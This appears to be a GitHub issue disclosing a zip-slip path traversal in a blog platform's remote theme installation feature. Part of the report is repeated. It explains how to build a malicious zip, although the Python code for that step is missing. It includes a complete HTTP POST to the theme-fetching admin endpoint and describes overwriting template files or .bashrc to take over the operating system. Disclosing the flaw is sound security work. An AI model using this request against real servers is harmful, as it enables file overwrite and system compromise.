When we want to install a theme, we can choose to download and install it from a remote http address,
When downloading a zip file and decompressing it, there is no path verification, and it can be decompressed to any path in any operating system. This is very dangerous and can allow malicious people to obtain operating system permissions.
First make a evil zip file,Make this zip file using python code
like this
Then start an http service and use the installation theme feature to start the installation
POST /api/admin/themes/fetching?uri=http:%2F%2F127.0.0.1:2333/evil-foo.zip HTTP/1.1
Host: 100.101.61.13:8090
Content-Length: 0
Admin-Authorization: 6ccadd335f0d4719a9418c0b16cfdc99
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Origin: http://100.101.61.13:8090
Referer: http://100.101.61.13:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Then you can see that our file test.txt is decompressed to the / tmp directory.
Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
The text was updated successfully, but these errors were encountered:
I am sure I have checked
I want to apply
When we want to install a theme, we can choose to download and install it from a remote http address,
When downloading a zip file and decompressing it, there is no path verification, and it can be decompressed to any path in any operating system. This is very dangerous and can allow malicious people to obtain operating system permissions.
First make a evil zip file,Make this zip file using python code
like this

Then start an http service and use the installation theme feature to start the installation
Then you can see that our file test.txt is decompressed to the / tmp directory.

Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
The text was updated successfully, but these errors were encountered: